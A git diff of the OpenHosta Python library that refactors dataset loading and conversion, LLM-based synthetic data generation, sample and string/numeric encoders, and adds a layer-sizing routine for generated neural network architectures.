+ elif source_type == SourceType.JSONL:
+ with open(path, 'w', encoding='utf-8') as f:
+ for row in dict_data:
+ json.dump(row, f) # type: ignore
+ f.write('\n')
+
+ else:
+ raise ValueError(f"Unsupported source type: {source_type}")
+
+ def save_data(self, file_path: str):
+ """
+        Save the dataset to a JSON file.
+ """
+ data_to_save = {
+ 'data': [
+ {
+ 'inputs': sample.input.tolist() if isinstance(sample.input, torch.Tensor) else sample.input,
+ 'outputs': sample.output.tolist() if isinstance(sample.output, torch.Tensor) else sample.output
+ }
+ for sample in self.data
+ ]
+ }
+ with open(file_path, 'w', encoding='utf-8') as f:
+ json.dump(data_to_save, f) # type: ignore
+
+ def load_data(self, file_path: str):
+ with open(file_path, 'r', encoding='utf-8') as f:
+ data_dict = json.load(f)
+
+ for sample_dict in data_dict['data']:
+ self.add(sample_dict)
+
+ ########################################################
+    ### Conversion ###
def convert_files(self, path: str, source_type: Optional[SourceType] = None) -> List[Sample]:
"""
Load dataset from a file and convert each row to a Sample object.
@@ -158,14 +437,15 @@ def convert_files(self, path: str, source_type: Optional[SourceType] = None) ->
source_type = SourceType.CSV
elif path.endswith('.jsonl'):
source_type = SourceType.JSONL
+ elif path.endswith('.json'):
+ source_type = SourceType.JSON
else:
raise ValueError(f"Please specify the source type for the file: {path}")
if source_type == SourceType.CSV:
- with open(path, 'r') as f:
+ with open(path, 'r', encoding='utf-8') as f:
reader = csv.DictReader(f)
for row in reader:
- # Convert string numbers to float if possible
processed_row = {}
for key, value in row.items():
try:
@@ -175,163 +455,127 @@ def convert_files(self, path: str, source_type: Optional[SourceType] = None) ->
self.data.append(Sample(processed_row))
elif source_type == SourceType.JSONL:
- with open(path, 'r') as f:
+ with open(path, 'r', encoding='utf-8') as f:
for line in f:
record = json.loads(line)
if not isinstance(record, dict):
record = {'input_0': record}
self.data.append(Sample(record))
+ elif source_type == SourceType.JSON:
+ with open(path, 'r', encoding='utf-8') as f:
+ data = json.load(f)
+ if isinstance(data, dict):
+ self.convert_dict(data)
+ elif isinstance(data, list):
+ self.convert_list(data)
+ else:
+ raise ValueError(f"Unsupported data format in JSON file: {path}")
+
else:
raise ValueError(f"Unsupported source type: {source_type}")
return self.data
- def convert_list(self, data: list) -> List[Sample]:
- """
- Create a dataset from a list.
-
- Args:
- data: List of dictionaries or tuples/lists representing Sample _inputs and _outputs.
- Each item should either be:
- - a dict with keys for _inputs (e.g., 'input_0', 'input_1', ...) and optional '_outputs', or
- - a tuple/list where the first part is _inputs(s) and the last item is _outputs (optional).
- Returns:
- HostaDataset instance
+    def convert_list(self, data: Optional[list] = None) -> List[Sample]:
"""
-
+ Convert a dataset from a list.
+ """
+ data = data if data is not None else self.data
+ output_data = []
for entry in data:
if isinstance(entry, dict):
# If the entry is already a dictionary, let's assume it has the keys in the right structure
- self.add(Sample(entry))
+ output_data.append(Sample(entry))
elif isinstance(entry, (list, tuple)):
- # If it's a list or tuple, we assume it's structured as (_inputs..., [_outputs])
- inputs = list(entry[:-1]) # All but last element are _inputs
- output = entry[-1] if len(entry) > 1 else None # Last element could be _outputs if present
+ # If it's a list or tuple, we assume it's structured as (inputs..., [outputs])
+ inputs = list(entry[:-1]) # All but last element are inputs
+ output = entry[-1] if len(entry) > 1 else None # Last element could be outputs if present
sample_dict = {f'input_{i}': input_value for i, input_value in enumerate(inputs)}
if output is not None:
- sample_dict['_outputs'] = output
- self.add(Sample(sample_dict))
+ sample_dict['outputs'] = output
+ output_data.append(Sample(sample_dict))
else:
raise ValueError(f"Unsupported data format in list entry: {entry}")
- def encode(self, max_tokens: int) -> None:
- """
- Encode le dataset d'entraînement et crée le dictionnaire
- """
- if self._encoder is None:
- self._encoder = SimpleEncoder()
- self.data = self._encoder.encode(self.data, max_tokens=max_tokens)
- self.dictionary = self._encoder.dictionary
-
- def encode_inference(self) -> None:
- """
- Encode les données d'inférence avec le dictionnaire existant
- """
- if self.dictionary is None:
- raise ValueError("No dictionary available. Call encode() first on training data")
-
- self._encoder = SimpleEncoder(existing_dict=self.dictionary)
- self.inference = self._encoder.encode([self.inference], max_tokens=10)[0]
+ self.data = output_data
+ return self.data
- def tensorify(self, dtype=None) -> None:
- """
- Convertit le dataset d'entraînement en tenseurs
- """
- if dtype is None:
- dtype = torch.float32
-
- for sample in self.data:
- if not isinstance(sample.input, torch.Tensor):
- sample._inputs = torch.tensor(sample.input, dtype=dtype)
-
- if sample.output is not None and not isinstance(sample.output, torch.Tensor):
- if isinstance(sample.output, (int, float)):
- sample._outputs = torch.tensor(sample.output, dtype=dtype)
- else:
- sample._outputs = torch.tensor(sample.output, dtype=dtype)
- def tensorify_inference(self, dtype=None) -> None:
+ def convert_dict(self, data: dict) -> List[Sample]:
"""
- Convertit les données d'inférence en tenseurs
+ Convert a dataset from a dict.
"""
- if dtype is None:
- dtype = torch.float32
-
- if not isinstance(self.inference.input, torch.Tensor):
- self.inference._inputs = torch.tensor(self.inference.input, dtype=dtype)
+ data = data if data is not None else self.data
+ output_data = []
+ for key, value in data.items():
+            if not isinstance(value, dict):
+                value = {'outputs': value}
+            else:
+                value['outputs'] = value.pop(key, None)
+ output_data.append(Sample(value))
+ self.data = output_data
+ return self.data
- def prepare_inference(self, inference_data: dict) -> None:
- """
- Prépare les données d'inférence en les encodant et les convertissant en tenseurs
- """
- self.inference = Sample(inference_data)
- self.encode_inference()
- self.tensorify_inference()
+ ########################################################
+ ### Class Generator ###
@staticmethod
- def from_input(inference_data: dict, verbose: int = 0) -> 'HostaDataset':
+ def from_files(path: str, source_type: Optional[SourceType], log: Logger) -> 'HostaDataset':
"""
- Crée un dataset à partir de données d'inférence
+ Load a dataset from a file.
"""
- dataset = HostaDataset(verbose)
- dataset.prepare_inference(inference_data)
+ dataset = HostaDataset(log)
+ dataset.convert_files(path, source_type)
return dataset
-
- def decode(self, predictions: List[Any], func_f_type: Any) -> List[Any]:
+
+ @staticmethod
+ def from_list(data: list, logger: Logger) -> 'HostaDataset':
"""
- Decode the model predictions based on the function's return type.
+ Create a dataset from a list.
"""
- if self._encoder is None:
- raise ValueError("Dataset must be encoded before decoding")
-
- # Check if func_f_type is a typing.Literal
- # if isinstance(func_f_type, typing._GenericAlias) and get_origin() is Literal:
-
- # if get_origin(func_f_type) is Literal:
- # Return decoded predictions using the encoder
- # return [self._encoder.decode_prediction(pred) for pred in predictions]
- # else:
- decoded_predictions = []
- for pred in predictions:
- pred_value = pred.detach().cpu().numpy()
- # Convert pred_value to the expected type
- # Handle scalar and array predictions
- if pred_value.size == 1:
- pred_scalar = pred_value.item()
- else:
- pred_scalar = pred_value
- try:
- converted_pred = func_f_type(pred_scalar)
- except (TypeError, ValueError):
- converted_pred = pred_scalar # Return as is if conversion fails
- decoded_predictions.append(converted_pred)
- if func_f_type != list:
- decoded_predictions = decoded_predictions[0]
- return decoded_predictions
-
+ dataset = HostaDataset(logger)
+ dataset.convert_list(data)
+ return dataset
+
@staticmethod
- def from_files(path: str, source_type: Optional[SourceType], verbose: int = 1) -> 'HostaDataset':
+ def from_input(inference_data: dict, logger: Logger, max_tokens : int, func: Func, dictionary_path : str) -> 'HostaDataset':
"""
- Load a dataset from a file.
+        Create a dataset from inference data.
"""
- dataset = HostaDataset(verbose)
- dataset.convert_files(path, source_type)
+ dataset = HostaDataset(logger)
+ dataset.prepare_inference(inference_data, max_tokens, func, dictionary_path)
return dataset
-
+
@staticmethod
- def from_list(data: list, verbose: int) -> 'HostaDataset':
+    def from_data(data_path: str, logger: Logger) -> 'HostaDataset':
"""
- Create a dataset from a list.
+ Load a dataset from a file and convert it into dataloader for training.
"""
- dataset = HostaDataset(verbose)
- dataset.convert_list(data)
+ dataset = HostaDataset(logger)
+ dataset.load_data(data_path)
+
return dataset
+ # if config.batch_size is None:
+ # config.batch_size = max(1, min(16384, int(0.05 * len(dataset.data))))
+ # return dataset.to_dataloaders(batch_size=config.batch_size, shuffle=shuffle, train_ratio=train_ratio)
- @staticmethod
def __len__(self):
return len(self.data)
def __iter__(self):
return iter(self.data)
+
+
+if __name__ == "__main__":
+ logger = Logger()
+ dataset = HostaDataset(logger)
+
+ dataset.convert_files("data.csv", SourceType.CSV)
+
+ dataset.encode(...)
+ dataset.tensorize()
+ train, val = dataset.to_dataloaders(32)
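The min-max denormalization in `denormalize_output` above inverts a scaling of the model output into [-1, 1]. A minimal standalone sketch of that arithmetic (function names here are illustrative, not part of the diff):

```python
def normalize(y: float, y_min: float, y_max: float) -> float:
    # Forward min-max scaling into [-1, 1].
    return 2 * (y - y_min) / (y_max - y_min) - 1

def denormalize(y_norm: float, y_min: float, y_max: float) -> float:
    # Inverse transform, mirroring denormalize_output: a degenerate range
    # (y_max == y_min) collapses every prediction to the constant y_min.
    if y_max == y_min:
        return y_min
    return ((y_norm + 1) / 2) * (y_max - y_min) + y_min
```

Round-tripping a value through both functions recovers it, which is the property the training/inference pipeline relies on.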
diff --git a/src/OpenHosta/exec/predict/dataset/oracle.py b/src/OpenHosta/exec/predict/dataset/oracle.py
index abccebd..5afaad5 100644
--- a/src/OpenHosta/exec/predict/dataset/oracle.py
+++ b/src/OpenHosta/exec/predict/dataset/oracle.py
@@ -1,6 +1,7 @@
import inspect
-from typing import Optional, Dict, Any, List, Type, Union, get_args, Literal
+from typing import Optional, Dict, Any, List, Type, Union, Literal, get_args, get_origin
+from ....core.logger import Logger
from ....core.config import Model, DefaultManager
from ....core.hosta import Func
@@ -13,7 +14,8 @@ class LLMSyntheticDataGenerator:
@staticmethod
- def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[str, float]]]:
+ def _validate_row(row: str, expected_fields: List[Type], logger: Logger) -> Optional[List[Union[str, float]]]:
+ logger.log_custom("Data Generation", f"Validating row: {row}", one_line=False)
try:
values = row.strip().split(',')
@@ -40,14 +42,14 @@ def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[
else:
return None
- elif getattr(expected_type, '__origin__', None) is Literal:
+ elif get_origin(expected_type) is Literal:
valid_literals = get_args(expected_type)
- if value in valid_literals:
- result.append(value)
+ if value.strip('"') in valid_literals:
+ result.append(value.strip('"'))
else:
- return None # Invalid Literal
+ return None
- elif getattr(expected_type, '__origin__', None) is Union and type(None) in get_args(expected_type):
+ elif get_origin(expected_type) is Union and type(None) in get_args(expected_type):
non_none_types = [t for t in get_args(expected_type) if t is not type(None)]
for t in non_none_types:
if t == int:
@@ -76,7 +78,7 @@ def _validate_row(row: str, expected_fields: List[Type]) -> Optional[List[Union[
@staticmethod
def _format_example(input_val: Any, output_val: Any) -> str:
"""
- Format a single example based on _inputs/_outputs types.
+ Format a single example based on inputs/outputs types.
"""
if isinstance(input_val, (list, tuple)):
input_str = ','.join(map(str, input_val))
@@ -104,15 +106,17 @@ def _build_user_prompt(
for input_val, output_val in examples.items():
user_prompt += f"{LLMSyntheticDataGenerator._format_example(input_val, output_val)}\n"
- user_prompt += f"\n\nGenerate {examples_in_req} new DIVERSE _inputs-_outputs pairs, one per line, in CSV format"
+ user_prompt += f"\n\nGenerate {examples_in_req} new DIVERSE inputs-outputs pairs, one per line, in CSV format"
if output_type == str:
- user_prompt += " (remember to enclose string _outputs in quotes ex: \"_outputs\")"
+ user_prompt += " (remember to enclose string outputs in quotes ex: \"outputs\")"
user_prompt += ":\n"
- user_prompt += f"{','.join(func.f_sig.parameters.keys())},_outputs"
- user_prompt += f"\n{','.join([str(f"\n- {a} is type {b.annotation.__name__ if b.annotation != inspect.Parameter.empty else 'Any'}")\
- for a, b in func.f_sig.parameters.items()])}\n"
- user_prompt += f"- _outputs is type {output_type.__name__}\n"
+ user_prompt += f"{','.join(func.f_sig.parameters.keys())},outputs"
+ user_prompt += "\n" + "\n".join([
+ f"- {a} is type {b.annotation.__name__ if b.annotation != inspect.Parameter.empty else 'Any'}"
+ for a, b in func.f_sig.parameters.items()
+ ]) + "\n"
+ user_prompt += f"- outputs is type {output_type.__name__}\n"
return user_prompt
@@ -120,6 +124,7 @@ def _build_user_prompt(
@staticmethod
def generate_synthetic_data(
func: Func, # The function to generate data for
+ logger: Logger, # Logger to use for logging
request_amounts: int = 3, # Amount of requests to the model
examples_in_req: int = 50, # Examples amount in each request
model: Optional[Model] = None # Model to use for data generation
@@ -134,7 +139,7 @@ def generate_synthetic_data(
to_append = {}
for i, key in enumerate(input_types.keys()):
to_append[key] = ex_inputes[i]
- to_append["_outputs"] = ex_output
+ to_append["outputs"] = ex_output
if not model:
model = DefaultManager.get_default_model()
@@ -160,7 +165,6 @@ def generate_synthetic_data(
result: List[Dict] = []
conversation_history: List = []
attempts = 0
- expected_fields = len(input_types) + 1
conversation_history.append({
"role": "system",
@@ -199,11 +203,11 @@ def generate_synthetic_data(
rows = response["choices"][0]["message"]["content"].strip().split('\n')
for row in rows:
- cleaned_row = LLMSyntheticDataGenerator._validate_row(row, list(input_types.values()) + [output_type])
+ cleaned_row = LLMSyntheticDataGenerator._validate_row(row, list(input_types.values()) + [output_type], logger)
if cleaned_row:
if cleaned_row not in generated_data:
dictrow = dict(zip(input_types.keys(), cleaned_row[:-1]))
- dictrow["_outputs"] = cleaned_row[-1]
+ dictrow["outputs"] = cleaned_row[-1]
result.append(dictrow)
generated_data.append(cleaned_row)
@@ -213,7 +217,7 @@ def generate_synthetic_data(
conversation_history = [conversation_history[0]] + conversation_history[-9:]
except Exception as e:
- print(f"Error during generation: {e} line {e.__traceback__.tb_lineno}")
+ logger.log_custom("Data Generation", f"Error during generation: {e} line {e.__traceback__.tb_lineno}")
attempts += 1
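`_validate_row` above dispatches on the annotation with `typing.get_origin`/`get_args`; the Literal branch can be sketched in isolation like this (the helper name is illustrative):

```python
from typing import Literal, get_args, get_origin

def is_valid_literal(value: str, expected_type) -> bool:
    # A CSV cell matches a Literal annotation when, after stripping the
    # surrounding quotes the generator adds around strings, it is one of
    # the declared literal values.
    if get_origin(expected_type) is not Literal:
        return False
    return value.strip('"') in get_args(expected_type)
```

Using `get_origin` here is the portable replacement for the older `getattr(expected_type, '__origin__', None)` pattern that the diff removes.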
diff --git a/src/OpenHosta/exec/predict/dataset/sample_type.py b/src/OpenHosta/exec/predict/dataset/sample_type.py
index 67277db..078dc4a 100644
--- a/src/OpenHosta/exec/predict/dataset/sample_type.py
+++ b/src/OpenHosta/exec/predict/dataset/sample_type.py
@@ -6,15 +6,14 @@
class Sample:
"""
A class to handle data samples for machine learning.
- Expects a dictionary where all keys except '_outputs' are considered as _inputs.
+    Expects a dictionary where all keys except 'outputs' are considered as inputs.
Example:
data = {
- 'feature1': [1, 2], # Any key except '_outputs' is considered _inputs
+ 'feature1': [1, 2], # Any key except 'outputs' is considered _inputs
'feature2': {'a': 3}, # Can contain any nested structure
'feature3': 4, # Can contain any primitive type
- 'feature4': BaseModel(), # Can contain Pydantic models
- '_outputs': 9 # Optional _outputs
+ 'outputs': 9 # Optional outputs
}
sample = Sample(data)
"""
@@ -26,7 +25,7 @@ def __init__(self, data: dict):
self._inputs: List[Any] = []
self._outputs: Optional[Any] = None
- output_data = data.pop('_outputs', None)
+ output_data = data.pop('outputs', None)
if output_data is not None:
output_flattened = self._flatten_data(output_data)
self._outputs = output_flattened[0] if len(output_flattened) == 1 else output_flattened
@@ -58,10 +57,22 @@ def input(self) -> List[Any]:
"""Get the _inputs features"""
return self._inputs
+ @input.setter
+ def input(self, value: List[Any]) -> None:
+ """Set the input features."""
+ if not isinstance(value, list):
+ raise ValueError("The 'input' property must be a list.")
+ self._inputs = value
+
@property
def output(self) -> Optional[Any]:
"""Get the _outputs label (None if no _outputs was provided)"""
return self._outputs
+ @output.setter
+ def output(self, value: Optional[Any]) -> None:
+ """Set the output label."""
+ self._outputs = value
+
def __repr__(self) -> str:
return f"Sample(_inputs={self.input}, _outputs={self.output})"
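To illustrate the contract described in the `Sample` docstring above — every key except `'outputs'` becomes an input, and nested lists are flattened into a flat feature vector — here is a minimal stand-alone sketch (`MiniSample` is a hypothetical stand-in, not the class from the diff):

```python
from typing import Any, List, Optional

class MiniSample:
    """Minimal stand-in for Sample: every key except 'outputs' is an input."""
    def __init__(self, data: dict):
        data = dict(data)  # copy so the caller's dict is not mutated
        self.output: Optional[Any] = data.pop('outputs', None)
        self.inputs: List[Any] = []
        for value in data.values():
            # Flatten one level of lists/tuples so features form a flat vector.
            if isinstance(value, (list, tuple)):
                self.inputs.extend(value)
            else:
                self.inputs.append(value)
```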
diff --git a/src/OpenHosta/exec/predict/encoder/simple_encoder.py b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
index a738320..a9d91ce 100644
--- a/src/OpenHosta/exec/predict/encoder/simple_encoder.py
+++ b/src/OpenHosta/exec/predict/encoder/simple_encoder.py
@@ -1,17 +1,37 @@
-from typing import List, Any, Dict, Union
+from typing import List, Any, Dict, Union, Optional
+
+import torch
+import json
+import re
from .base_encoder import BaseEncoder
from ..dataset.sample_type import Sample
-class NumericEncoder(BaseEncoder):
- def encode(self, value: Union[int, float]) -> float:
+class IntegerEncoder(BaseEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
+ def encode(self, value: int) -> int:
+ return int(value)
+
+ def decode(self, encoded_value: float) -> int:
+ return int(encoded_value)
+
+class FloatEncoder(BaseEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
+ def encode(self, value: float) -> float:
return float(value)
- def decode(self, encoded_value: float) -> Union[int, float]:
- return encoded_value
+ def decode(self, encoded_value: float) -> float:
+ return float(encoded_value)
class BooleanEncoder(BaseEncoder):
+ def __init__(self) -> None:
+ super().__init__()
+
def encode(self, value: bool) -> int:
return int(value)
@@ -19,108 +39,126 @@ def decode(self, encoded_value: int) -> bool:
return bool(encoded_value)
class StringEncoder(BaseEncoder):
- def __init__(self, existing_dict: Dict[str, int] = None):
- """
- Initialize with optional existing dictionary.
- If existing_dict is provided, we're in inference mode.
- """
- self.inference_mode = existing_dict is not None
- self.word_to_id = {'<UNK>': 0} if existing_dict is None else existing_dict
- self.id_to_word = {v: k for k, v in self.word_to_id.items()}
- self.next_id = max(self.word_to_id.values()) + 1 if self.word_to_id else 1
- self.max_tokens = None
-
- def set_max_tokens(self, max_tokens: int):
- """Set maximum length for encoded sequences"""
+    def __init__(self, dictionary: Dict[str, int], max_tokens: int, inference: bool) -> None:
+ super().__init__()
+ self.dictionary = dictionary
self.max_tokens = max_tokens
+ self.inference = inference
+ self.next_id = max(self.dictionary.values()) + 1 if self.dictionary else 1
- def encode(self, value: str) -> List[int]:
- """
- Encode a string into a list of integers.
- For classification (_outputs), returns a single integer.
- For _inputs features, returns a list of integers of length max_tokens.
- """
- if self.max_tokens is None:
- raise ValueError("max_tokens must be set before encoding")
+ @staticmethod
+ def string_to_list(input_string):
+ tokens = re.findall(r'[a-zA-Zà-ÿ]+|[^a-zA-Zà-ÿ\s]', input_string.lower())
+ return tokens
- words = str(value).lower().strip().split()
+ def encode(self, data: str) -> list[Union[str, int]]:
+ words = self.string_to_list(data)
encoded = []
for word in words:
- if not self.inference_mode and word not in self.word_to_id:
- self.word_to_id[word] = self.next_id
- self.id_to_word[self.next_id] = word
- self.next_id += 1
- encoded.append(self.word_to_id.get(word, 0))
+ if self.inference:
+ encoded.append(self.dictionary.get(word, 0))
+ else:
+ if word not in self.dictionary:
+ self.dictionary[word] = self.next_id
+ encoded.append(self.next_id)
+ self.next_id += 1
+ else:
+ encoded.append(self.dictionary[word])
if len(encoded) > self.max_tokens:
return encoded[:self.max_tokens]
+
return encoded + [0] * (self.max_tokens - len(encoded))
+
+    def decode(self, encoded_value: int) -> str:
+        # dictionary maps word -> id, so invert it to look up a word by its id
+        inverse = {idx: word for word, idx in self.dictionary.items()}
+        return inverse.get(encoded_value, '<UNK>')
+
+ @property
+    def get_dictionnary(self) -> Dict[str, int]:
+ return self.dictionary
+
+class MappingEncoder(BaseEncoder):
+ def __init__(self, mapping_dict: Dict[int, Any]) -> None:
+ self.mapping_dict = mapping_dict
- def decode(self, encoded_value: Union[int, List[int]]) -> str:
- """
- Decode either a single integer (classification) or list of integers (features)
- """
- if isinstance(encoded_value, (int, float)):
- return self.id_to_word.get(int(encoded_value), '<UNK>')
+ def encode(self, value: Any) -> int:
+ return self.mapping_dict[value]
- words = []
- for idx in encoded_value:
- if idx != 0: # Skip padding
- words.append(self.id_to_word.get(idx, '<UNK>'))
- return ' '.join(words)
+ def decode(self, encoded_value: int) -> Any:
+ for key, value in self.mapping_dict.items():
+ if value == encoded_value:
+ return key
+ raise ValueError(f"Unknown value: {encoded_value}")
class SimpleEncoder:
- def __init__(self, existing_dict: Dict[str, int] = None):
- self.string_encoder = StringEncoder(existing_dict)
- self.feature_types = {}
+    def __init__(self, max_tokens: int, dictionary: Dict[str, int], dictionary_path: str, mapping_dict: Dict[str, int], inference: bool) -> None:
self.encoders = {
- str: self.string_encoder,
- int: NumericEncoder(),
- float: NumericEncoder(),
+ str: StringEncoder(dictionary, max_tokens, inference),
+ int: IntegerEncoder(),
+ float: FloatEncoder(),
bool: BooleanEncoder()
}
+ self.mapping_dict = mapping_dict
+ self.dictionary_path = dictionary_path
+
+ @staticmethod
+    def init_encoder(max_tokens: int, dictionary: Dict[str, int], dictionary_path: str, mapping_dict: Dict[str, int], inference: bool) -> 'SimpleEncoder':
+        encoder = SimpleEncoder(max_tokens, dictionary, dictionary_path, mapping_dict, inference)
+        return encoder
+
+ def save_dictionary(self, dictionary: Dict[int, str]) -> None:
+ with open(self.dictionary_path, 'w', encoding='utf-8') as f:
+ json.dump(dictionary, f, indent=2, sort_keys=True) # type: ignore
+
+
+ def encode(self, samples: List[Sample]) -> List[Sample]:
- def encode(self, samples: List[Sample], max_tokens: int) -> List[Sample]:
- self.string_encoder.set_max_tokens(max_tokens)
-
encoded_samples = []
for sample in samples:
encoded_input = []
for idx, value in enumerate(sample.input):
- encoder = self.encoders[type(value)]
- self.feature_types[idx] = type(value)
- encoded_value = encoder.encode(value)
- if isinstance(encoded_value, list):
- encoded_input.extend(encoded_value)
+ encoder_in = self.encoders[type(value)]
+ encoded_value_in = encoder_in.encode(value)
+ if isinstance(encoded_value_in, list):
+ encoded_input.extend(encoded_value_in)
else:
- encoded_input.append(encoded_value)
+ encoded_input.append(encoded_value_in)
encoded_output = None
if sample.output is not None:
- if isinstance(sample.output, str):
- print("\033[93mWarning: Multiple string _outputs not supported, only using the first word will be used for _outputs\033[0m")
- output_idx = len(sample.input)
- encoder = self.encoders[type(sample.output)]
- self.feature_types[output_idx] = type(sample.output)
- encoded_output = encoder.encode(sample.output)
- # Like multiple str _outputs not supported only use the first str _outputs
- if isinstance(encoded_output, list):
- encoded_output = encoded_output[0]
-
+ if self.mapping_dict is None:
+ encoder_out = self.encoders[type(sample.output)]
+ encoded_value_out = encoder_out.encode(sample.output)
+ else:
+ encoder_out = MappingEncoder(self.mapping_dict)
+ encoded_value_out = encoder_out.encode(sample.output)
+ encoded_output = encoded_value_out
+
encoded_samples.append(Sample({
- '_inputs': encoded_input,
- '_outputs': encoded_output
+ 'inputs': encoded_input,
+ 'outputs': encoded_output
}))
+ self.save_dictionary(self.encoders[str].get_dictionnary)
return encoded_samples
+
+    def decode(self, predictions: Optional[torch.Tensor], output_type: Any) -> Any:
- def decode_prediction(self, prediction: Any, position: int) -> Any:
- if position not in self.feature_types:
- raise ValueError(f"Unknown feature position: {position}")
+        if predictions is None:
+            return None
+        predictions = predictions.cpu().detach().numpy()
+
+ if self.mapping_dict is None:
+ predictions = predictions[0]
+ if output_type not in self.encoders:
+ raise ValueError(f"Unknown output type in decoder: {output_type}")
+ encoder_out = self.encoders[output_type]
+ return encoder_out.decode(predictions)
+ else:
+ value = predictions.argmax()
+ encoder_out = MappingEncoder(self.mapping_dict)
+ return encoder_out.decode(value)
- return self.encoders[self.feature_types[position]].decode(prediction)
- @property
- def dictionary(self) -> Dict[str, int]:
- return self.string_encoder.word_to_id
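The `StringEncoder` logic above — tokenize into words and punctuation, assign incremental ids in training mode, fall back to 0 for unknown words at inference, then truncate or right-pad to `max_tokens` — can be sketched as a single function (a simplified restatement under the same assumptions, not the class itself):

```python
import re
from typing import Dict, List

def encode_string(text: str, dictionary: Dict[str, int], max_tokens: int,
                  inference: bool = False) -> List[int]:
    # Tokenize like StringEncoder.string_to_list: runs of letters, or
    # single non-letter, non-space characters (punctuation).
    tokens = re.findall(r'[a-zA-Zà-ÿ]+|[^a-zA-Zà-ÿ\s]', text.lower())
    encoded = []
    for word in tokens:
        if inference:
            encoded.append(dictionary.get(word, 0))  # 0 == unknown token
        else:
            if word not in dictionary:
                dictionary[word] = max(dictionary.values(), default=0) + 1
            encoded.append(dictionary[word])
    # Truncate, or right-pad with the unknown id 0, to a fixed length.
    return encoded[:max_tokens] + [0] * max(0, max_tokens - len(encoded))
```

Reserving id 0 for unknown tokens is what lets inference mode degrade gracefully on words never seen during training.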
diff --git a/src/OpenHosta/exec/predict/model/builtins/algo_architecture.py b/src/OpenHosta/exec/predict/model/builtins/algo_architecture.py
new file mode 100644
index 0000000..1f80938
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/builtins/algo_architecture.py
@@ -0,0 +1,87 @@
+import math
+from typing import List
+
+def _get_nb_layer(complexity: int):
+ """
+ Get the number of layers for a neural network based on its complexity.
+ L_total refers to the total number of layers.
+ L_up refers to the number of layers in the upward path.
+ L_down refers to the number of layers in the downward path.
+ """
+ l_total = 2 * complexity + 1
+ l_up = (l_total - 1) // 2
+ l_down = l_total - l_up - 1
+ return l_up, l_down
+
+
+def _round_to_power_of_two(value: float) -> int:
+ """
+ Round a number to the nearest power of 2.
+ """
+ return 2 ** int(round(math.log2(value)))
+
+def _get_layers_size(n_in, n_out, n_peak, l_up, l_down, growth_rate, max_layer_size) -> List[int]:
+ """
+ this function calculates the size of each layer in a neural network.
+ """
+ layers_size = [n_in]
+ current_size = n_in
+
+ # Upward Phase
+ for i in range(l_up):
+ next_size = current_size * growth_rate
+ next_size = min(next_size, n_peak, max_layer_size)
+ next_size = _round_to_power_of_two(next_size)
+ layers_size.append(int(next_size))
+ current_size = next_size
+
+ # Downward Phase
+ for i in range(l_down):
+ next_size = current_size / growth_rate
+ next_size = max(next_size, n_out)
+ next_size = _round_to_power_of_two(next_size)
+ layers_size.append(int(next_size))
+ current_size = next_size
+
+ # Ensure that the last layer size is n_out
+ layers_size[-1] = n_out
+
+ return layers_size
+
+
+def get_algo_architecture(input_size: int, output_size: int, complexity: int, growth_rate: float, max_layer_coefficient: int) -> List[int]:
+ """
+ this function generates the architecture of a neural network.
+ the complexity defines the number of layers in the network.
+ growth_rate defines the rate at which the number of neurons grows.
+ max_layer_coefficient defines the maximum size of the maximum layer.
+ """
+ n_in = input_size
+ n_out = output_size
+ n_max = max(n_in, n_out)
+
+ max_layer_size = max_layer_coefficient * n_max
+
+ l_up, l_down = _get_nb_layer(complexity)
+
+ n_peak = n_in * (growth_rate ** l_up)
+ n_peak = min(n_peak, max_layer_size)
+    n_peak = _round_to_power_of_two(n_peak)  # Ensure n_peak is a power of 2
+
+ layers_size = _get_layers_size(n_in, n_out, n_peak, l_up, l_down, growth_rate, max_layer_size)
+
+ return layers_size
+
+
+# test the algorithm
+########################################################
+
+# if __name__ == "__main__":
+# input_size = 8
+# output_size = 2
+# complexity = 5
+# growth_rate = 1.5
+# max_layer_coefficient = 150
+
+# architecture = get_algo_architecture(input_size, output_size, complexity, growth_rate, max_layer_coefficient)
+# print("Generated architecture:", architecture)
\ No newline at end of file
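The sizing rules in `algo_architecture.py` above combine a symmetric up/down layer split with nearest-power-of-two rounding; both pieces can be checked independently (a sketch restating the two helpers):

```python
import math

def layer_split(complexity: int):
    # L_total = 2 * complexity + 1 layers, split into an up and a down path.
    l_total = 2 * complexity + 1
    l_up = (l_total - 1) // 2
    l_down = l_total - l_up - 1
    return l_up, l_down

def nearest_power_of_two(value: float) -> int:
    # Round in log space, so 6 -> 8 (log2 6 ~ 2.58) but 5 -> 4 (log2 5 ~ 2.32).
    return 2 ** int(round(math.log2(value)))
```

Rounding in log space rather than linearly keeps layer widths at hardware-friendly powers of two on both the growing and shrinking sides of the pyramid.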
diff --git a/src/OpenHosta/exec/predict/model/builtins/classification.py b/src/OpenHosta/exec/predict/model/builtins/classification.py
index d08aabd..9482b8e 100644
--- a/src/OpenHosta/exec/predict/model/builtins/classification.py
+++ b/src/OpenHosta/exec/predict/model/builtins/classification.py
@@ -1,146 +1,156 @@
-### NOT IMPLEMENTED YET ###
-
from typing import Optional
import torch
from torch import nn
from torch import optim
+from torch.optim.lr_scheduler import StepLR
+from .algo_architecture import get_algo_architecture
from ..hosta_model import HostaModel
from ..neural_network import NeuralNetwork
+from ..neural_network_types import ArchitectureType
+from ....predict.predict_config import PredictConfig
from .....utils.torch_nn_utils import custom_optimizer_to_pytorch, custom_loss_to_pytorch, custom_layer_to_pytorch
-
+from .....core.logger import Logger, ANSIColor
class Classification(HostaModel):
- def __init__(self, neural_network: Optional[NeuralNetwork], input_size: int, output_size: int, complexity: int, num_classes: int, device: Optional[str] = None):
+ def __init__(
+ self,
+ neural_network: Optional[NeuralNetwork],
+ input_size: int,
+ output_size: int,
+ config: PredictConfig,
+ logger: Logger,
+ device: Optional[str] = None
+ ):
super().__init__(device)
- self.complexity = complexity
- self.num_classes = num_classes
- self.verbose = True
- self.layers = []
+ self.complexity = config.complexity
+ self.logger = logger
+ self.device = device
+ self.growth_rate = config.growth_rate
+ self.max_layer_coefficent = config.coef_layers
+ self.architecture_type = ArchitectureType.CLASSIFICATION
+
if neural_network is None or neural_network.layers is None or len(neural_network.layers) == 0:
- transition_value = int(((input_size * output_size) / 2) * self.complexity)
-
- input_layer = int(input_size * (2 * self.complexity))
- if input_size > output_size:
- hidden_layer_1 = int(transition_value / output_size)
- else:
- hidden_layer_1 = transition_value
-
